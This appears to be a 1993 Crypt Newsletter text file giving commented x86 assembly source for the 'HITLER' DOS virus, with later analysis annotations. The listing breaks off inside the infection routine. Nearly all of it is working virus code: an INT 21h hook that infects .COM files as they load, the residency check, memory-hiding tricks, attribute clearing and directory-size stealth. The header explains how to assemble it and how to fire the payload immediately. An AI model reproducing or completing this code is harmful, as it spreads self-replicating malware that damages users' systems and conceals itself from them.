Text File  |  1993-01-05  |  39KB  |  719 lines

  1. ;The HITLER virus: commented in a rough 'n' ready way by the 
  2. ;Crypt Newsletter staff for issue #11, January 1993.                
  3. ;The HITLER virus is a memory resident .COM infector which adds itself
  4. ;to the end of infected files. HITLER employs
  5. ;minimal directory stealth. 
  6. ;The minimal stealth allows the virus to subtract its file size from                
  7. ;infected targets when the user takes a look at them using "dir"
  8. ;functions while the virus is in memory.
  9. ;Most of HITLER's code is devoted to a huge data table which is a voice
  10. ;sample of some nut shouting "HITLER."  The virus ties the effect to
  11. ;the timer tick function, but if you want to hear it immediately, change the
  12. ;source where indicated. The resulting code will assemble under A86. On
  13. ;execution the virus will lock the PC into the voice effect until reboot,
  14. ;rendering it uninfective, if annoying.  Not all PC's can generate the
  15. ;HITLER sound effect - some will just buzz.
  16.  
  17.  
  18.                 call    rakett      ; pushes the runtime address of 'old'; popped below to locate the code
  19. old             db '═ É!¡'          ; 5-byte buffer: 'infect' reads a host's first five bytes here, 'failed' copies them back to 100h
  20. rakett:         pop     bp          ; bp = runtime address of 'old'
  21.                 push    bp          ; keep a copy on the stack; 'failed' pops it into si
  22.                 add     bp,-103h    ; bp = load displacement (presumably 'old' assembles at 103h, after a 3-byte call at 100h)
  23. ; Residency check: the resident handler (ni21) answers AX=42ABh with carry clear.
  24.                 mov     ax,42ABh    ; check if virus installed
  25.                 int     21h
  26.                 jnc     failed      ; carry clear = a copy is already resident, skip installation
  27. ; Save the current INT 21h and INT 1Ch vectors into old21 / old1C (addressed through bp).
  28.                 cli
  29.                 mov     ax,3521h
  30.                 int     21h                         ; get interrupt vector
  31.                 mov     w [bp+offset old21],bx      ; es:bx points to
  32.                 mov     w [bp+offset old21+2],es    ; interrupt handler
  33.  
  34.                 mov     al,1Ch                      ; ah is not reloaded; assumes it still holds 35h
  35.                 int     21h                         ; get the INT 1Ch (timer tick) vector
  36.                 cli
  37.                 mov     w [bp+offset old1C],bx      ; save timer tick vector, offset
  38.                 mov     w [bp+offset old1C+2],es    ; save timer tick vector, segment
  39.                 mov     w [bp+offset teller],16380  ; store 16380 in 'teller'; the word is
  40.                 sti                                 ; defined and consumed outside this
  41.                                                     ; excerpt
  42.                 call    normalspeed                 ; defined outside this excerpt; purpose not visible here
  43. ; Step ds back one paragraph: lodsb with the direction flag set decrements si.
  44.                 mov     si,ds
  45.                 std
  46.                 lodsb                               ; al is loaded as a side effect and not used
  47.                 cld
  48.                 mov     ds,si                       ; ds = old ds - 1 (presumably the memory control block ahead of the PSP)
  49. ; Shrink that block by 'pgf' paragraphs and lower the word at [12h] by the same amount.
  50.                 xor     bx,bx
  51.                 mov     cx,pgf                      ; pgf is defined outside this excerpt
  52.                 cmp     b [bx],'Z'                  ; continue only if the block is marked 'Z'
  53.                 jne     failed
  54.                 mov     ax,[bx+3]                   ; word at offset 3 (presumably the block size in paragraphs)
  55.                 sub     ax,cx
  56.                 jc      failed                      ; block smaller than pgf: give up
  57.                 mov     [bx+3],ax
  58.                 sub     [bx+12h],cx                 ; presumably the PSP top-of-memory word, one paragraph past the header
  59.                 mov     es,[bx+12h]                 ; es = lowered segment, destination of the copy below
  60. ; Copy 'size' bytes of the running code to es:100h.
  61.                 push    cs
  62.                 pop     ds
  63.  
  64.                 mov     di,100h
  65.                 mov     si,bp
  66.                 add     si,di                       ; si = bp + 100h, runtime start of the code
  67.                 mov     cx,size
  68.                 rep     movsb
  69. ; With ds = es, point INT 21h and INT 1Ch at the handlers inside the copy.
  70.                 push    es
  71.                 pop     ds
  72.                 mov     ax,2521h
  73.                 mov     dx,offset ni21     ; set int 21 route through virus
  74.                 int     21h
  75.                 mov     al,1Ch             ; ah assumed to still hold 25h
  76.                 mov     dx,offset ni1C     ; revector timer tick through
  77.                 int     21h                ; virus
  78. ; Analysis note: the copy lies above the shrunken block, so the reduced size of that block is the visible trace of residency.
  79. failed:         push    cs                  ; all paths of the entry code end here: set ds = es = cs
  80.                 push    cs
  81.                 pop     ds
  82.                 pop     es
  83. ; Put the host's saved first five bytes back at 100h and return into the host.
  84.                 pop     si                  ; si = address of 'old', pushed at 'rakett'
  85.                 mov     di,100h
  86.                 push    di                  ; 100h becomes the near return address
  87.                 movsw
  88.                 movsw
  89.                 movsb                       ; 2 + 2 + 1 = five bytes copied
  90.  
  91.                 mov     cx,0FFh             ; NOTE(review): presumably register values the host expects at start - confirm
  92.                 mov     si,100h
  93.                 ret                    ; exit to host
  94.  
  95.  
  96. findFCB:        popf                   ; entered from ni21 for ah=11h/12h; drops the flags ni21 pushed
  97.                 call    int21          ; run the previous INT 21h handler first
  98.                 pushf                  ; keep its flags across the test below
  99.                 or      al,al          ; al = 0 means the FCB search returned an entry
  100.                 jnz     backFCB        ; nonzero: nothing to adjust
  101.                 call    stealth        ; rewrite the size in the returned entry
  102. backFCB:        popf
  103.                 iret
  104.  
  105. stealth:        push    ax          ; the following essentially massages the
  106.                 push    bx          ; file control block on directory scans,
  107.                 push    dx         ; subtracting the virus size from infected
  108.                 push    es          ; files before the user sees 'em
  109. ; ax, bx, dx and es are saved here and restored at shitFCB.
  110.                 mov     ah,2Fh       ; get disk transfer address
  111.                 call    int21        ; es:bx = DTA holding the search result
  112. ; Analysis note: the marker tested below is a seconds field with all five bits set, which is not a valid time of day.
  113.                 cmp     byte es:[bx],0FFh ; first byte 0FFh? (presumably the extended-FCB marker, not a failure code)
  114.                 jne     normFCB           ; no: use bx as it is
  115.                 add     bx,8              ; yes: skip 8 bytes
  116. normFCB:        mov     al,byte es:[bx+16h]  ; byte read as the low half of the file time - TODO confirm offset
  117.                 and     al,31                ; keep the low five bits
  118.                 xor     al,31                ; result is zero only when all five are set
  119.                 jnz     shitFCB              ; not 31 - file not infected
  120.                 mov     ax,word es:[bx+1Ch]  ; dx:ax = 32-bit size field
  121.                 mov     dx,word es:[bx+1Ch+2]
  122.                 sub     ax,size              ; subtract virus length from
  123.                 sbb     dx,0                 ; infected file
  124.                 jc      shitFCB              ; field smaller than 'size': leave the entry untouched
  125.                 mov     word es:[bx+1Ch],ax  ; write the reduced size back into the DTA
  126.                 mov     word es:[bx+1Ch+2],dx
  127. shitFCB:                                     ; restore everything as normal
  128.                 pop     es
  129.                 pop     dx
  130.                 pop     bx
  131.                 pop     ax
  132.                 ret
  133.  
  134. ni21:           pushf               ; resident INT 21h handler; flags saved across the compares below
  135.                 cmp     ah,11h    ; FCB find-first
  136.                 je      findFCB   ; -> size-hiding path
  137.                 cmp     ah,12h    ; FCB find-next
  138.                 je      findFCB
  139.  
  140.                 cmp     ax,42ABh  ; residency query issued by the entry code
  141.                 jne     not_42AB
  142.                 popf
  143.                 clc               ; carry clear = "already resident"
  144.                 retf    2         ; far return that drops the caller's saved flags, so the cleared carry survives
  145. not_42AB:
  146.                 cmp     ax,4B00h    ; is a program being loaded?
  147.                 jne     not_4B00    ; exit if not
  148. ; Analysis note: attributes are read, cleared and later restored around the write, so the read-only bit alone does not block it.
  149.                 call    install_24  ; install critical error handler
  150.  
  151.                 push    ax          ; ax, bx, cx, dx, ds, bp saved here, restored at back1
  152.                 push    bx
  153.                 push    cx
  154.                 push    dx
  155.                 push    ds
  156.                 push    bp
  157.  
  158.                 mov     ax,4300h     ; get file attributes of potential host
  159.                 call    int21
  160.                 jc      back1        ; failed? exit
  161.                 mov     cs:old_attr,cx   ; stash attributes in the operand of the 'mov cx' built from db 0B9h below
  162.  
  163.                 test    cl,4         ; is the potential host a system file?
  164.                 jnz     back1        ; yes? so exit
  165.  
  166.                 mov     ax,4301h     ; set attributes to 0 (cx is cleared on the next line)
  167.                 xor     cx,cx
  168.                 call    int21
  169.                 jc      back1        ; error? exit
  170.  
  171.                 push    dx           ; preserve ds:dx (the name pointer used by the calls above) across infect
  172.                 push    ds
  173.                 call    infect       ; begin infection stuff
  174.                 pop     ds
  175.                 pop     dx
  176.  
  177.                 mov     ax,4301h     ; put the original attributes back
  178. db              0B9h    ;mov CX,...
  179. old_attr        dw 0    ; immediate operand of that mov, patched at run time
  180.                 call    int21
  181.  
  182. back1:                             ;go here if the attrib-get fails
  183.                 pop     bp
  184.                 pop     ds
  185.                 pop     dx
  186.                 pop     cx
  187.                 pop     bx
  188.                 pop     ax
  189.  
  190. call    remove_24                 ; normalize critical error handler
  191.  
  192. not_4B00:
  193. back:           popf
  194.                 db 0EAh              ; opcode of a far jmp; the two words at old21 are its target
  195. old21           dw 0,0               ; saved INT 21h vector, filled in by the entry code
  196.  
  197. int21:          pushf                        ; pushf + far call mimics an INT to the previous handler
  198.                 call    dword ptr cs:old21   ; previous INT 21h handler, address saved in old21
  199.                 ret
  200.  
  201. infect:         mov     ax,3D02h    ; open host file with read/write access
  202.                 call    int21
  203.                 jnc     okay_open
  204. bad1:           ret                 ; was there an error? exit
  205. okay_open:      xchg    bx,ax
  206.                 mov     ax,5700h    ; get file date and file time
  207.                 call    int21
  208.                 push    cx
  209.                 mov     bp,sp
  210.                 push    dx
  211.  
  212.                 mov     ah,3Fh   ; read first five bytes from potential host
  213.                 mov     cx,5
  214.                 mov     dx,offset old ; store them here
  215.                 push    cs
  216.                 pop     ds
  217.                 call    int21
  218.                 jc      close